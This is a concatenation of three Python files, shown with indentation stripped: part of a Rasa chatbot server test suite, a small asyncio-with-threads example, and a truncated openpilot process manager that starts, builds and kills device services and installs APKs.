assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
from pathlib import Path
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> Text:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return fake_model_path
def run_server() -> NoReturn:
import rasa
rasa.train = mocked_training_function
from rasa import __main__
import sys
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server)
yield server
server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
payload["force"] = True
response = requests.post("http://localhost:5005/model/train", json=payload)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return requests.get("http://localhost:5005/status").status_code == 200
except Exception:
return False
# wait until server is up before sending train request and status test loop
while not is_server_ready():
time.sleep(1)
training_request.start()
# Wait until the blocking training function was called
while shared_statuses.get("started_training") is not True:
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
while shared_statuses.get("training_result") is None:
time.sleep(1)
# Check that the training worked correctly
assert shared_statuses["training_result"] == 200
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app,
default_domain_path,
default_stories_file,
default_stack_config,
default_nlu_data,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app, default_stack_config, default_nlu_data, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(), config=config_file.read(), nlu=nlu_file.read()
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_core_success(
rasa_app, default_stack_config, default_stories_file, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(open(default_stories_file))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_missing_config(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config=None)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_missing_training_data(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_internal_error(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 500
def test_evaluate_stories(rasa_app, default_stories_file):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app.post("/model/test/stories", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicTestClient, default_stories_file
):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == 409
def test_evaluate_stories_end_to_end(rasa_app, end_to_end_story_file):
stories = rasa.utils.io.read_file(end_to_end_story_file)
_, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_intent(rasa_app, default_nlu_data):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicTestClient, default_nlu_data
):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app_nlu.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_with_query_param(
rasa_app, trained_nlu_model, default_nlu_data
):
_, response = rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}", data=nlu_data
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, "name": "greet"},
"text": "hello",
},
},
]
}
}
_, response = rasa_app.post(
"/model/predict", json=data, headers={"Content-Type": "application/json"}
)
content = response.json
assert response.status == 200
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
_, response = rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == 200
assert content["paused"] is False
assert content["slots"] == {"location": None, "cuisine": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
"name": "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app, event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 4
evt = tracker.get("events")[3]
deserialised_event = Event.from_parameters(evt)
assert deserialised_event == event
assert deserialised_event.timestamp > tracker.get("events")[2]["timestamp"]
def test_push_multiple_events(rasa_app: SanicTestClient):
cid = str(uuid.uuid1())
conversation = f"/conversations/{cid}"
events = [e.as_dict() for e in test_events]
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{cid}/tracker")
tracker = tracker_response.json
assert tracker is not None
# there is also an `ACTION_LISTEN` event at the start
assert len(tracker.get("events")) == len(test_events) + 3
assert tracker.get("events")[3:] == events
def test_put_tracker(rasa_app: SanicTestClient):
data = [event.as_dict() for event in test_events]
_, response = rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
content = response.json
assert response.status == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 200
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 403
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
def test_list_routes(default_agent: Agent):
from rasa import server
app = server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
def test_unload_model_error(rasa_app: SanicTestClient):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = rasa_app.delete("/model")
assert response.status == 204
def test_get_domain(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain", headers={"accept": "application/json"})
content = response.json
assert response.status == 200
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain")
assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
def test_load_model_from_model_server(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
import rasa.core.jobs
rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
_, response = rasa_app.put("/model")
assert response.status == 400
def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
data = {"model_file": "some-random-path"}
_, response = rasa_app.put("/model", json=data)
assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "test_execute")
data = {"name": "utter_greet"}
_, response = rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
test_sender = "test_execute_with_missing_action_name"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 400
def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
test_sender = "test_execute_with_not_existing_action"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
data = {"name": "greet"}
_, response = rasa_app.post("/conversations/test_trigger/trigger_intent", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 400
def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 404
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
([RestInput(), SlackInput("test")], "slack", SlackBot),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
|
multithreadAsync.py
|
import asyncio
from threading import Thread
from multiprocessing import Process
from time import sleep
from LibF.GPA import *
#Mutli Thread Concurrency
#"@MAN.main.task" adds the function below to a tasks list
@MAN.main.task
#MAN is a built in manager for having up to 4 concurrent threads
async def helloWorld():
for i in range(3):
print("Hello World!")
await asyncio.sleep(0.2)
@MAN.main.task
async def anotherOne():
for i in range(3):
print("I'm running concurrently!")
await asyncio.sleep(0.1)
@MAN.side.task
#MAN is a built in manager for having up to 4 concurrent threads (class 'MTManager')
async def pythonista():
for i in range(3):
print("We love Python!")
await asyncio.sleep(0.3)
@MAN.side.task
async def anotherThread():
for i in range(3):
print("I'm on another thread!")
await asyncio.sleep(0.1)
#Execution looks like this when using multiple threads
if __name__ == '__main__':
#Man has 4 available threads: main, side, back, and util
T1 = Thread(target=MAN.main.run, args=())
T2 = Thread(target=MAN.side.run, args=())
#You could also run other functions in one of the threads, for example:
T3 = Thread(target=print,args=("Third Thread"))
T1.start()
T2.start()
T3.start()
#T1.join() <- You may join the threads if you so choose
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
if __name__ == "__main__":
if os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 6):
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"controlsd": "selfdrive.controls.controlsd",
"radard": "selfdrive.controls.radard",
"ubloxd": "selfdrive.locationd.ubloxd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'gpsd',
'ubloxd',
'updated',
]
car_started_processes = [
'controlsd',
'loggerd',
'sensord',
'radard',
'visiond',
'proclogd',
'orbd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
for p in running:
cloudlog.debug(" running %s %s" % (p, running[p]))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.iterkeys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
